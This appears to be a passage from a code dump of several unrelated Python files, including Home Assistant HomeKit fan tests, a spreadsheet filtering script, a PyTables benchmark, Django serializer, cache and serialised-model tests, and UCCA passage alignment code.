entity_id = "fan.demo"
hass.states.async_set(
entity_id,
STATE_ON,
{ATTR_SUPPORTED_FEATURES: SUPPORT_OSCILLATE, ATTR_OSCILLATING: False},
)
await hass.async_block_till_done()
acc = Fan(hass, hk_driver, "Fan", entity_id, 1, None)
hk_driver.add_accessory(acc)
assert acc.char_swing.value == 0
await acc.run()
await hass.async_block_till_done()
assert acc.char_swing.value == 0
hass.states.async_set(entity_id, STATE_ON, {ATTR_OSCILLATING: True})
await hass.async_block_till_done()
assert acc.char_swing.value == 1
# Set from HomeKit
call_oscillate = async_mock_service(hass, DOMAIN, "oscillate")
char_swing_iid = acc.char_swing.to_HAP()[HAP_REPR_IID]
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_swing_iid,
HAP_REPR_VALUE: 0,
},
]
},
"mock_addr",
)
await hass.async_add_executor_job(acc.char_swing.client_update_value, 0)
await hass.async_block_till_done()
assert call_oscillate[0]
assert call_oscillate[0].data[ATTR_ENTITY_ID] == entity_id
assert call_oscillate[0].data[ATTR_OSCILLATING] is False
assert len(events) == 1
assert events[-1].data[ATTR_VALUE] is False
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_swing_iid,
HAP_REPR_VALUE: 1,
},
]
},
"mock_addr",
)
await hass.async_add_executor_job(acc.char_swing.client_update_value, 1)
await hass.async_block_till_done()
assert call_oscillate[1]
assert call_oscillate[1].data[ATTR_ENTITY_ID] == entity_id
assert call_oscillate[1].data[ATTR_OSCILLATING] is True
assert len(events) == 2
assert events[-1].data[ATTR_VALUE] is True
async def test_fan_speed(hass, hk_driver, events):
"""Test fan with speed."""
entity_id = "fan.demo"
hass.states.async_set(
entity_id,
STATE_ON,
{
ATTR_SUPPORTED_FEATURES: SUPPORT_SET_SPEED,
ATTR_PERCENTAGE: 0,
ATTR_PERCENTAGE_STEP: 25,
},
)
await hass.async_block_till_done()
acc = Fan(hass, hk_driver, "Fan", entity_id, 1, None)
hk_driver.add_accessory(acc)
# Initial value can be anything but 0. If it is 0, it might cause HomeKit to set the
# speed to 100 when turning on a fan on a freshly booted up server.
assert acc.char_speed.value != 0
assert acc.char_speed.properties[PROP_MIN_STEP] == 25
await acc.run()
await hass.async_block_till_done()
hass.states.async_set(entity_id, STATE_ON, {ATTR_PERCENTAGE: 100})
await hass.async_block_till_done()
assert acc.char_speed.value == 100
# Set from HomeKit
call_set_percentage = async_mock_service(hass, DOMAIN, "set_percentage")
char_speed_iid = acc.char_speed.to_HAP()[HAP_REPR_IID]
char_active_iid = acc.char_active.to_HAP()[HAP_REPR_IID]
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_speed_iid,
HAP_REPR_VALUE: 42,
},
]
},
"mock_addr",
)
await hass.async_add_executor_job(acc.char_speed.client_update_value, 42)
await hass.async_block_till_done()
assert acc.char_speed.value == 42
assert acc.char_active.value == 1
assert call_set_percentage[0]
assert call_set_percentage[0].data[ATTR_ENTITY_ID] == entity_id
assert call_set_percentage[0].data[ATTR_PERCENTAGE] == 42
assert len(events) == 1
assert events[-1].data[ATTR_VALUE] == 42
# Verify speed is preserved from off to on
hass.states.async_set(entity_id, STATE_OFF, {ATTR_PERCENTAGE: 42})
await hass.async_block_till_done()
assert acc.char_speed.value == 42
assert acc.char_active.value == 0
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_active_iid,
HAP_REPR_VALUE: 1,
},
]
},
"mock_addr",
)
await hass.async_block_till_done()
assert acc.char_speed.value == 42
assert acc.char_active.value == 1
async def test_fan_set_all_one_shot(hass, hk_driver, events):
"""Test fan with speed."""
entity_id = "fan.demo"
hass.states.async_set(
entity_id,
STATE_ON,
{
ATTR_SUPPORTED_FEATURES: SUPPORT_SET_SPEED
| SUPPORT_OSCILLATE
| SUPPORT_DIRECTION,
ATTR_PERCENTAGE: 0,
ATTR_OSCILLATING: False,
ATTR_DIRECTION: DIRECTION_FORWARD,
},
)
await hass.async_block_till_done()
acc = Fan(hass, hk_driver, "Fan", entity_id, 1, None)
hk_driver.add_accessory(acc)
# Initial value can be anything but 0. If it is 0, it might cause HomeKit to set the
# speed to 100 when turning on a fan on a freshly booted up server.
assert acc.char_speed.value != 0
await acc.run()
await hass.async_block_till_done()
hass.states.async_set(
entity_id,
STATE_OFF,
{
ATTR_SUPPORTED_FEATURES: SUPPORT_SET_SPEED
| SUPPORT_OSCILLATE
| SUPPORT_DIRECTION,
ATTR_PERCENTAGE: 0,
ATTR_OSCILLATING: False,
ATTR_DIRECTION: DIRECTION_FORWARD,
},
)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_OFF
# Set from HomeKit
call_set_percentage = async_mock_service(hass, DOMAIN, "set_percentage")
call_oscillate = async_mock_service(hass, DOMAIN, "oscillate")
call_set_direction = async_mock_service(hass, DOMAIN, "set_direction")
call_turn_on = async_mock_service(hass, DOMAIN, "turn_on")
call_turn_off = async_mock_service(hass, DOMAIN, "turn_off")
char_active_iid = acc.char_active.to_HAP()[HAP_REPR_IID]
char_direction_iid = acc.char_direction.to_HAP()[HAP_REPR_IID]
char_swing_iid = acc.char_swing.to_HAP()[HAP_REPR_IID]
char_speed_iid = acc.char_speed.to_HAP()[HAP_REPR_IID]
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_active_iid,
HAP_REPR_VALUE: 1,
},
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_speed_iid,
HAP_REPR_VALUE: 42,
},
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_swing_iid,
HAP_REPR_VALUE: 1,
},
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_direction_iid,
HAP_REPR_VALUE: 1,
},
]
},
"mock_addr",
)
await hass.async_block_till_done()
assert not call_turn_on
assert call_set_percentage[0]
assert call_set_percentage[0].data[ATTR_ENTITY_ID] == entity_id
assert call_set_percentage[0].data[ATTR_PERCENTAGE] == 42
assert call_oscillate[0]
assert call_oscillate[0].data[ATTR_ENTITY_ID] == entity_id
assert call_oscillate[0].data[ATTR_OSCILLATING] is True
assert call_set_direction[0]
assert call_set_direction[0].data[ATTR_ENTITY_ID] == entity_id
assert call_set_direction[0].data[ATTR_DIRECTION] == DIRECTION_REVERSE
assert len(events) == 3
assert events[0].data[ATTR_VALUE] is True
assert events[1].data[ATTR_VALUE] == DIRECTION_REVERSE
assert events[2].data[ATTR_VALUE] == 42
hass.states.async_set(
entity_id,
STATE_ON,
{
ATTR_SUPPORTED_FEATURES: SUPPORT_SET_SPEED
| SUPPORT_OSCILLATE
| SUPPORT_DIRECTION,
ATTR_PERCENTAGE: 0,
ATTR_OSCILLATING: False,
ATTR_DIRECTION: DIRECTION_FORWARD,
},
)
await hass.async_block_till_done()
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_active_iid,
HAP_REPR_VALUE: 1,
},
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_speed_iid,
HAP_REPR_VALUE: 42,
},
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_swing_iid,
HAP_REPR_VALUE: 1,
},
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_direction_iid,
HAP_REPR_VALUE: 1,
},
]
},
"mock_addr",
)
# Turn on should not be called if its already on
# and we set a fan speed
await hass.async_block_till_done()
assert len(events) == 6
assert call_set_percentage[1]
assert call_set_percentage[1].data[ATTR_ENTITY_ID] == entity_id
assert call_set_percentage[1].data[ATTR_PERCENTAGE] == 42
assert call_oscillate[1]
assert call_oscillate[1].data[ATTR_ENTITY_ID] == entity_id
assert call_oscillate[1].data[ATTR_OSCILLATING] is True
assert call_set_direction[1]
assert call_set_direction[1].data[ATTR_ENTITY_ID] == entity_id
assert call_set_direction[1].data[ATTR_DIRECTION] == DIRECTION_REVERSE
assert events[-3].data[ATTR_VALUE] is True
assert events[-2].data[ATTR_VALUE] == DIRECTION_REVERSE
assert events[-1].data[ATTR_VALUE] == 42
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_active_iid,
HAP_REPR_VALUE: 0,
},
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_speed_iid,
HAP_REPR_VALUE: 42,
},
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_swing_iid,
HAP_REPR_VALUE: 1,
},
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_direction_iid,
HAP_REPR_VALUE: 1,
},
]
},
"mock_addr",
)
await hass.async_block_till_done()
assert len(events) == 7
assert call_turn_off
assert call_turn_off[0].data[ATTR_ENTITY_ID] == entity_id
assert len(call_set_percentage) == 2
assert len(call_oscillate) == 2
assert len(call_set_direction) == 2
async def test_fan_restore(hass, hk_driver, events):
"""Test setting up an entity from state in the event registry."""
hass.state = CoreState.not_running
registry = er.async_get(hass)
registry.async_get_or_create(
"fan",
"generic",
"1234",
suggested_object_id="simple",
)
registry.async_get_or_create(
"fan",
"generic",
"9012",
suggested_object_id="all_info_set",
capabilities={"speed_list": ["off", "low", "medium", "high"]},
supported_features=SUPPORT_SET_SPEED | SUPPORT_OSCILLATE | SUPPORT_DIRECTION,
device_class="mock-device-class",
)
hass.bus.async_fire(EVENT_HOMEASSISTANT_START, {})
await hass.async_block_till_done()
acc = Fan(hass, hk_driver, "Fan", "fan.simple", 2, None)
assert acc.category == 3
assert acc.char_active is not None
assert acc.char_direction is None
assert acc.char_speed is None
assert acc.char_swing is None
acc = Fan(hass, hk_driver, "Fan", "fan.all_info_set", 2, None)
assert acc.category == 3
assert acc.char_active is not None
assert acc.char_direction is not None
assert acc.char_speed is not None
assert acc.char_swing is not None
async def test_fan_preset_modes(hass, hk_driver, events):
"""Test fan with direction."""
entity_id = "fan.demo"
hass.states.async_set(
entity_id,
STATE_ON,
{
ATTR_SUPPORTED_FEATURES: SUPPORT_PRESET_MODE,
ATTR_PRESET_MODE: "auto",
ATTR_PRESET_MODES: ["auto", "smart"],
},
)
await hass.async_block_till_done()
acc = Fan(hass, hk_driver, "Fan", entity_id, 1, None)
hk_driver.add_accessory(acc)
assert acc.preset_mode_chars["auto"].value == 1
assert acc.preset_mode_chars["smart"].value == 0
await acc.run()
await hass.async_block_till_done()
hass.states.async_set(
entity_id,
STATE_ON,
{
ATTR_SUPPORTED_FEATURES: SUPPORT_PRESET_MODE,
ATTR_PRESET_MODE: "smart",
ATTR_PRESET_MODES: ["auto", "smart"],
},
)
await hass.async_block_till_done()
assert acc.preset_mode_chars["auto"].value == 0
assert acc.preset_mode_chars["smart"].value == 1
# Set from HomeKit
call_set_preset_mode = async_mock_service(hass, DOMAIN, "set_preset_mode")
call_turn_on = async_mock_service(hass, DOMAIN, "turn_on")
char_auto_iid = acc.preset_mode_chars["auto"].to_HAP()[HAP_REPR_IID]
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_auto_iid,
HAP_REPR_VALUE: 1,
},
]
},
"mock_addr",
)
await hass.async_block_till_done()
assert call_set_preset_mode[0]
assert call_set_preset_mode[0].data[ATTR_ENTITY_ID] == entity_id
assert call_set_preset_mode[0].data[ATTR_PRESET_MODE] == "auto"
assert len(events) == 1
assert events[-1].data["service"] == "set_preset_mode"
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_auto_iid,
HAP_REPR_VALUE: 0,
},
]
},
"mock_addr",
)
await hass.async_block_till_done()
assert call_turn_on[0]
assert call_turn_on[0].data[ATTR_ENTITY_ID] == entity_id
assert events[-1].data["service"] == "turn_on"
assert len(events) == 2
| sander76/home-assistant | tests/components/homekit/test_type_fans.py | Python | apache-2.0 | 20,146 |
#-------------------------------------------------------------------------------
# Name: 濠碘槅鍨埀顒冩珪閸?
# Purpose:
#
# Author: zhx
#
# Created: 17/05/2016
# Copyright: (c) zhx 2016
# Licence: <your licence>
#-------------------------------------------------------------------------------
import openpyxl
def main():
cctv_data = openpyxl.load_workbook('train_all_feature_reg.xlsx')
cctv_new = openpyxl.Workbook()
new_sheet = cctv_new.active
sheet = cctv_data["Sheet"]
cnt = 2
for r in xrange(1,4749):
if r==1:
for i in xrange(1,29):
new_sheet.cell(row=1,column=i).value = sheet.cell(row=r,column=i).value
continue
print r
picture = sheet.cell(row=r,column=4).value
min_min = sheet.cell(row=r,column=9).value
min_max = sheet.cell(row=r,column=10).value
min_mean = sheet.cell(row=r,column=11).value
num_posi = sheet.cell(row=r,column=18).value
if num_posi == None:
continue
if min_min == None:
continue
elif min_min==99999:
continue
else:
for i in range(1,29):
if i ==4 :
new_sheet.cell(row=cnt,column=i).value = int (sheet.cell(row=r,column=i).value)
else:
new_sheet.cell(row=cnt,column=i).value = sheet.cell(row=r,column=i).value
## new_sheet.cell(row=cnt,column=2).value = sheet.cell(row=r,column=2).value
## new_sheet.cell(row=cnt,column=3).value = sheet.cell(row=r,column=3).value
## new_sheet.cell(row=cnt,column=4).value = int(sheet.cell(row=r,column=4).value)
## new_sheet.cell(row=cnt,column=5).value = sheet.cell(row=r,column=5).value
## new_sheet.cell(row=cnt,column=6).value = sheet.cell(row=r,column=6).value
## new_sheet.cell(row=cnt,column=7).value = sheet.cell(row=r,column=7).value
## new_sheet.cell(row=cnt,column=8).value = sheet.cell(row=r,column=8).value
## new_sheet.cell(row=cnt,column=9).value = sheet.cell(row=r,column=9).value
## new_sheet.cell(row=cnt,column=10).value = sheet.cell(row=r,column=10).value
## new_sheet.cell(row=cnt,column=11).value = sheet.cell(row=r,column=11).value
## new_sheet.cell(row=cnt,column=12).value = sheet.cell(row=r,column=12).value
## new_sheet.cell(row=cnt,column=13).value = sheet.cell(row=r,column=13).value
## new_sheet.cell(row=cnt,column=14).value = sheet.cell(row=r,column=14).value
## new_sheet.cell(row=cnt,column=15).value = sheet.cell(row=r,column=15).value
## new_sheet.cell(row=cnt,column=16).value = sheet.cell(row=r,column=16).value
## new_sheet.cell(row=cnt,column=17).value = sheet.cell(row=r,column=17).value
## new_sheet.cell(row=cnt,column=18).value = sheet.cell(row=r,column=18).value
cnt+=1
cctv_new.save("trainreg.xlsx")
main()
| vimilimiv/weibo-popularity_judge-and-content_optimization | 数据处理/delete.py | Python | mit | 3,023 |
from time import perf_counter as clock
import numpy as np
import tables as tb
N = 1000 * 1000
rnd = np.random.randint(N, size=N)
for dtype1 in ('S6', 'b1',
'i1', 'i2', 'i4', 'i8',
'u1', 'u2', 'u4', 'u8', 'f4', 'f8'):
for dtype2 in ('u4', 'i8'):
print("dtype array1, array2-->", dtype1, dtype2)
a = np.array(rnd, dtype1)
b = np.arange(N, dtype=dtype2)
c = a.copy()
t1 = clock()
d = c.argsort()
# c.sort()
# e=c
e = c[d]
f = b[d]
tref = clock() - t1
print("normal sort time-->", tref)
t1 = clock()
tb.indexesextension.keysort(a, b)
tks = clock() - t1
print("keysort time-->", tks, " {:.2f}x".format(tref / tks))
assert np.alltrue(a == e)
#assert numpy.alltrue(b == d)
assert np.alltrue(f == d)
| avalentino/PyTables | bench/keysort.py | Python | bsd-3-clause | 886 |
from rest_framework import serializers
from simpleTODO.models import Tag, Todo
class AutoCreatedPrimaryKeyRelatedField(serializers.PrimaryKeyRelatedField):
def to_internal_value(self, data):
if self.pk_field is not None:
data = self.pk_field.to_internal_value(data)
try:
return self.get_queryset().get_or_create(pk=data)[0]
except (TypeError, ValueError):
self.fail('incorrect_type', data_type=type(data).__name__)
class TodoSerializer(serializers.ModelSerializer):
tags = AutoCreatedPrimaryKeyRelatedField(queryset=Tag.objects, many=True)
class Meta:
model = Todo
fields = ("id", "content", "deadline", "tags", "done")
def create(self, validated_data):
tags = validated_data.pop("tags")
todo = Todo(user=self.context["request"].user, **validated_data)
todo.save()
for tag in tags:
todo.tags.add(tag)
return todo
| BenjaminSchubert/HttpInfrastructure | dynamic-server/src/httpInfrastructure/simpleTODO/serializers.py | Python | mit | 965 |
import unittest
from simpledecorators.Cache import Cache, TimeCacheStorage
called = 0
class SafeTest(unittest.TestCase):
def test_AddToCache(self):
global called
called = 0
@Cache(cacheStorage=TimeCacheStorage(time_seconds=1, maxCount=1000))
def func1(a,b,c):
global called
called += 1
return a + b + c
a = func1(1, 2, 3)
b = func1(1, 2, 3)
c = func1(1, 2, 3)
d = func1(1, 2, 3)
self.assertEqual(a, 1 + 2 + 3)
self.assertEqual(a, b)
self.assertEqual(b, c)
self.assertEqual(c, d)
self.assertEqual(called, 1)
def test_ReturnsNone(self):
global called
called = 0
@Cache(cacheStorage=TimeCacheStorage(time_seconds=1, maxCount=1000))
def func1(a, b, c):
global called
called += 1
return None
a = func1(1, 2, 3)
b = func1(1, 2, 3)
c = func1(1, 2, 3)
d = func1(1, 2, 3)
self.assertEqual(a, None)
self.assertEqual(a, b)
self.assertEqual(b, c)
self.assertEqual(c, d)
self.assertEqual(called, 1)
def test_sameArguments(self):
@Cache()
def func1(a, b, c):
return 1
@Cache()
def func2(a, b, c):
return 2
a = func1(1, 2, 3)
b = func2(1, 2, 3)
self.assertEqual(a, 1)
self.assertEqual(b, 2)
if __name__ == "__main__":
unittest.main()
| shaddyx/simpleDecorators | tests/CacheTest.py | Python | mit | 1,515 |
__copyright__ = 'Copyright(c) Gordon Elliott 2017'
"""
"""
import logging.config
import yaml
import pkg_resources
from dotmap import DotMap
config_path = pkg_resources.resource_filename(__name__, 'config/dev.yaml')
with open(config_path, 'r') as ymlfile:
configuration = DotMap(yaml.full_load(ymlfile))
logging.config.dictConfig(configuration.logging.toDict())
LOG = logging.getLogger(__file__)
LOG.info(f"Configuration loaded from {config_path}")
| gordon-elliott/glod | src/glod/configuration.py | Python | mit | 460 |
import sys
import pytest
from notifications_utils.serialised_model import (
SerialisedModel,
SerialisedModelCollection,
)
def test_cant_be_instatiated_with_abstract_properties():
class Custom(SerialisedModel):
pass
class CustomCollection(SerialisedModelCollection):
pass
with pytest.raises(TypeError) as e:
SerialisedModel()
if sys.version_info < (3, 9):
assert str(e.value) == (
"Can't instantiate abstract class SerialisedModel with abstract methods ALLOWED_PROPERTIES"
)
else:
assert (
"Can't instantiate abstract class SerialisedModel with abstract method ALLOWED_PROPERTIES"
)
with pytest.raises(TypeError) as e:
Custom()
if sys.version_info < (3, 9):
assert str(e.value) == (
"Can't instantiate abstract class Custom with abstract methods ALLOWED_PROPERTIES"
)
else:
assert str(e.value) == (
"Can't instantiate abstract class Custom with abstract method ALLOWED_PROPERTIES"
)
with pytest.raises(TypeError) as e:
SerialisedModelCollection()
if sys.version_info < (3, 9):
assert str(e.value) == (
"Can't instantiate abstract class SerialisedModelCollection with abstract methods model"
)
else:
assert str(e.value) == (
"Can't instantiate abstract class SerialisedModelCollection with abstract method model"
)
with pytest.raises(TypeError) as e:
CustomCollection()
if sys.version_info < (3, 9):
assert str(e.value) == (
"Can't instantiate abstract class CustomCollection with abstract methods model"
)
else:
assert str(e.value) == (
"Can't instantiate abstract class CustomCollection with abstract method model"
)
def test_looks_up_from_dict():
class Custom(SerialisedModel):
ALLOWED_PROPERTIES = {'foo'}
assert Custom({'foo': 'bar'}).foo == 'bar'
def test_cant_override_custom_property_from_dict():
class Custom(SerialisedModel):
ALLOWED_PROPERTIES = {'foo'}
@property
def foo(self):
return 'bar'
with pytest.raises(AttributeError) as e:
assert Custom({'foo': 'NOPE'}).foo == 'bar'
assert str(e.value) == "can't set attribute"
@pytest.mark.parametrize('json_response', (
{},
{'foo': 'bar'}, # Should still raise an exception
))
def test_model_raises_for_unknown_attributes(json_response):
class Custom(SerialisedModel):
ALLOWED_PROPERTIES = set()
model = Custom(json_response)
assert model.ALLOWED_PROPERTIES == set()
with pytest.raises(AttributeError) as e:
model.foo
assert str(e.value) == (
"'Custom' object has no attribute 'foo'"
)
def test_model_raises_keyerror_if_item_missing_from_dict():
class Custom(SerialisedModel):
ALLOWED_PROPERTIES = {'foo'}
with pytest.raises(KeyError) as e:
Custom({}).foo
assert str(e.value) == "'foo'"
@pytest.mark.parametrize('json_response', (
{},
{'foo': 'bar'}, # Should be ignored
))
def test_model_doesnt_swallow_attribute_errors(json_response):
class Custom(SerialisedModel):
ALLOWED_PROPERTIES = set()
@property
def foo(self):
raise AttributeError('Something has gone wrong')
with pytest.raises(AttributeError) as e:
Custom(json_response).foo
assert str(e.value) == 'Something has gone wrong'
def test_dynamic_properties_are_introspectable():
class Custom(SerialisedModel):
ALLOWED_PROPERTIES = {'foo', 'bar', 'baz'}
instance = Custom({'foo': '', 'bar': '', 'baz': ''})
assert dir(instance)[-3:] == ['bar', 'baz', 'foo']
def test_empty_serialised_model_collection():
class CustomCollection(SerialisedModelCollection):
model = None
instance = CustomCollection([])
assert not instance
assert len(instance) == 0
def test_serialised_model_collection_returns_models_from_list():
class Custom(SerialisedModel):
ALLOWED_PROPERTIES = {'x'}
class CustomCollection(SerialisedModelCollection):
model = Custom
instance = CustomCollection([
{'x': 'foo'},
{'x': 'bar'},
{'x': 'baz'},
])
assert instance
assert len(instance) == 3
assert instance[0].x == 'foo'
assert instance[1].x == 'bar'
assert instance[2].x == 'baz'
assert [
item.x for item in instance
] == [
'foo',
'bar',
'baz',
]
assert [
type(item) for item in instance + [1, 2, 3]
] == [
Custom, Custom, Custom, int, int, int,
]
instance_2 = CustomCollection([
{'x': 'red'},
{'x': 'green'},
{'x': 'blue'},
])
assert [
item.x for item in instance + instance_2
] == [
'foo',
'bar',
'baz',
'red',
'green',
'blue',
]
assert [
item.x for item in instance_2 + instance
] == [
'red',
'green',
'blue',
'foo',
'bar',
'baz',
]
| alphagov/notifications-utils | tests/test_serialised_model.py | Python | mit | 5,193 |
import inspect
import re
from collections import Counter
import distance
import numpy as np
import zss
from munkres import Munkres
from ucca.textutil import break2sentences, extract_terminals
from ucca import evaluation
from ucca import layer0, layer1
def compare(n1, n2):
return bool(labels(n1) & labels(n2))
def labels(n):
return evaluation.expand_equivalents(set(e.tag for e in n.incoming))
def label(n):
return n.ftag
def is_terminal(n):
"""returns true if the node contains only one terminal or less"""
return len(n.get_terminals()) <= 1
def is_foundational(node):
return node.tag == layer1.NodeTags.Foundational
def is_passage(n):
return not bool(n.fparent)
def is_comparable(n):
"""checks if the node is a node that should be compared between passages"""
return is_foundational(n) and (not is_terminal(n)) and (not is_passage(n))
def top_from_passage(p):
"""returns the top elements from a passage"""
l = p.layer(layer1.LAYER_ID)
return l.top_scenes + l.top_linkages
def preprocess_word(word):
"""standardize word form for the alignment task"""
return word.strip().lower()
def align(sen1, sen2, string=True):
"""finds the best mapping of words from one sentence to the other
string = a boolean represents if sentences are given as strings or as list of ucca terminal nodes
returns list of word tuples and the corresponding list of indexes tuples"""
if string:
sen1 = list(map(preprocess_word, sen1.split()))
sen2 = list(map(preprocess_word, sen2.split()))
else:
sen1 = [preprocess_word(terminal.text) for terminal in sen1]
sen2 = [preprocess_word(terminal.text) for terminal in sen2]
# find lengths
length_dif = len(sen1) - len(sen2)
if length_dif > 0:
shorter = sen2
longer = sen1
switched = False
else:
shorter = sen1
longer = sen2
switched = True
length_dif = abs(length_dif)
shorter += ["emptyWord"] * length_dif
# create matrix
matrix = np.zeros((len(longer), len(longer)))
for i in range(len(longer)):
for j in range(len(longer) - length_dif):
matrix[i, j] = distance.levenshtein(longer[i], shorter[j]) + float(abs(i - j)) / len(longer)
# compare with munkres
m = Munkres()
indexes = m.compute(matrix)
# remove indexing for emptywords and create string mapping
refactored_indexes = []
mapping = []
start = 0 if string else 1
for i, j in indexes:
if j >= len(longer) - length_dif:
j = -1 - start
if switched:
refactored_indexes.append((j + start, i + start))
mapping.append((shorter[j], longer[i]))
else:
refactored_indexes.append((i + start, j + start))
mapping.append((longer[i], shorter[j]))
return mapping, refactored_indexes
def regularize_word(word):
"""changes structure of the word to the same form (e.g. lowercase)"""
# remove non-alphanumeric
pattern = re.compile("[\W_]+")
word = pattern.sub("", word)
return word
def _to_text(passage, position):
""" returns the text og the position in the passage"""
return passage.layer(layer0.LAYER_ID).by_position(position).text
def _choose_ending_position(passage, position):
"""chooses the correct ending index,
position - an estimated sentence ending (e.g. by textutil.break2sentences)"""
reg = regularize_word(_to_text(passage, position))
# check current token is not deleted by regularization
if not reg and position:
position -= 1
reg = regularize_word(_to_text(passage, position))
return position, reg
def _count_mapping(positions1, positions2, word2word, from_key):
"""counts the number of satisfied mappings from positions[from_key] to the other positions"""
from_key -= 1
to_key = int(not from_key)
positions_list = [positions1, positions2]
terminal_positions1 = sorted(positions_list[from_key])
terminal_positions2 = sorted(positions_list[to_key])
sorted_word2word = sorted(word2word.copy(), key=lambda x: x[from_key])
# count in one pass in parallel, they are sorted
index = 0
count = 0
for mapping in sorted_word2word:
frm = mapping[from_key]
to = mapping[to_key]
if index == len(terminal_positions1):
break
if terminal_positions1[index] == frm:
index += 1
if to in terminal_positions2:
count += 1
return count
def two_sided_f(count1, count2, sum1, sum2):
"""computes an F score like measure"""
# check input
if not (sum1 and sum2):
print("got empty sums for F scores")
return 0
if sum1 < count1 or sum2 < count2:
print("got empty sums for F scores")
return 0
# calculate
precision = count2 / sum2
recall = count1 / sum1
if precision + recall == 0:
return 0
return 2 * (precision * recall) / (precision + recall)
def node_word2word_similarity(node1, node2, word2word, graceful=True):
""" compute an F score for two nodes based on the word2word mapping"""
if not (is_foundational(node1) and is_foundational(node2)):
if not graceful:
print("one of the requested nodes is not foundational")
return 0
terminal_positions1 = [term.para_pos for term in node1.get_terminals()]
terminal_positions2 = [term.para_pos for term in node2.get_terminals()]
# edge cases
if not (len(terminal_positions1) and len(terminal_positions2)):
if not graceful:
print("error: no terminals in node")
if not len(terminal_positions2):
print(node2.ID)
if not len(terminal_positions1):
print(node1.ID)
return 0
count1 = _count_mapping(terminal_positions1, terminal_positions2, word2word, 1)
count2 = _count_mapping(terminal_positions1, terminal_positions2, word2word, 2)
return two_sided_f(count1, count2, len(terminal_positions1), len(terminal_positions2))
def get_lowest_fn(p):
""" finds the FN that has terminals as children"""
s = set()
for term in extract_terminals(p):
s.update([edge.parent for edge in term.incoming if is_foundational(edge.parent)])
return s
def fully_align(p1, p2, word2word=None):
""" aligns nodes from p1 to those of p2 by finding the best matches from all pairs of nodes"""
if not word2word:
word2word = align_yields(p1, p2)
nodes1 = set(node for node in p1.layer(layer1.LAYER_ID).all if is_comparable(node))
nodes2 = set(node for node in p2.layer(layer1.LAYER_ID).all if is_comparable(node))
return align_nodes(nodes1, nodes2, word2word)
def top_down_align(p1, p2, word2word=None):
"""aligns nodes from p1 to those of p2 top down"""
if not word2word:
word2word = align_yields(p1, p2)
new = align_nodes(top_from_passage(p1), top_from_passage(p2), word2word)
remaining = dict(new)
mapping = dict(new)
while remaining:
n1, n2 = remaining.popitem()
new = align_nodes(n1.children, n2.children, word2word)
remaining.update(new)
mapping.update(new)
return mapping
def buttom_up_by_levels_align(p1, p2, word2word=None):
""" aligns all the nodes in two paragraphs going up from the terminals level by level"""
if not word2word:
word2word = align_yields(p1, p2)
mapping = {}
nodes1 = set(get_lowest_fn(p1))
nodes2 = set(get_lowest_fn(p2))
while nodes1 and nodes2:
mapping.update((align_nodes(nodes1, nodes2, word2word)))
nodes1 = set(node.fparent for node in nodes1 if node.fparent is not None)
nodes2 = set(node.fparent for node in nodes2 if node.fparent is not None)
return mapping
def buttom_up_paragraph_align(p1, p2, word2word=None):
""" aligns all the nodes in two paragraphs going up from the terminals level by level"""
if not word2word:
word2word = align_yields(p1, p2)
pairs1 = dict(p1.layer(layer0.LAYER_ID).pairs)
pairs2 = dict(p2.layer(layer0.LAYER_ID).pairs)
mapping = dict((pairs1[i], pairs2[j]) for i, j in word2word if i != -1 and j != -1)
next_checking1 = next_checking2 = None
checking1 = set(n for n in get_lowest_fn(p1) if is_comparable(n))
checking2 = set(n for n in get_lowest_fn(p2) if is_comparable(n))
save_next = True
waiting = set() # nodes that have unmapped children
while checking1 and checking2:
# save nodes from one level up for next look
if save_next:
next_checking1 = set(node.fparent for node in checking1 if node.fparent is not None)
next_checking2 = set(node.fparent for node in checking2 if node.fparent is not None)
save_next = False
# look for best match for one of the checked node
n1 = checking1.pop()
best = 0
is_waiting = False
n2 = None
for n in checking2:
current = 0
for child in n1.children:
if is_comparable(child) or child.tag == layer0.NodeTags.Word:
if child not in mapping:
waiting.add(n1)
best = -1
is_waiting = True
# print(n1)
break
if mapping[child] in n.children:
current += 1
if is_waiting:
break
if current > best or (current == best and compare(n1, n)):
n2 = n
best = current
if n2 and not is_waiting:
mapping[n1] = n2
checking2.remove(n2) # can only map one node to each node in p2
# if the queue is empty, fill it up if able
if not checking1 or not checking2:
checking1 |= next_checking1 | waiting
checking2 |= next_checking2
checking1 = checking1.difference(mapping.keys())
save_next = True
return mapping
def align_nodes(nodes1, nodes2, word2word):
"""finds best matching from the set of nodes nodes1 to the set nodes2
Note: this function is not symmetrical
"""
best = {}
mapping = {}
gen1 = (node for node in nodes1 if is_foundational(node))
gen2 = [node for node in nodes2 if is_foundational(node)]
for node1 in gen1:
for node2 in gen2:
sim = node_word2word_similarity(node1, node2, word2word)
if sim and (node1 not in best or sim > best[node1] or (sim == best[node1] and compare(node1, node2))):
best[node1] = sim
mapping[node1] = node2
# if best match got, stop looking for it
if best[node1] == 1 and compare(node1, node2):
break
return mapping
def break2common_sentences(p1, p2):
"""finds the positions of the common sentence ending
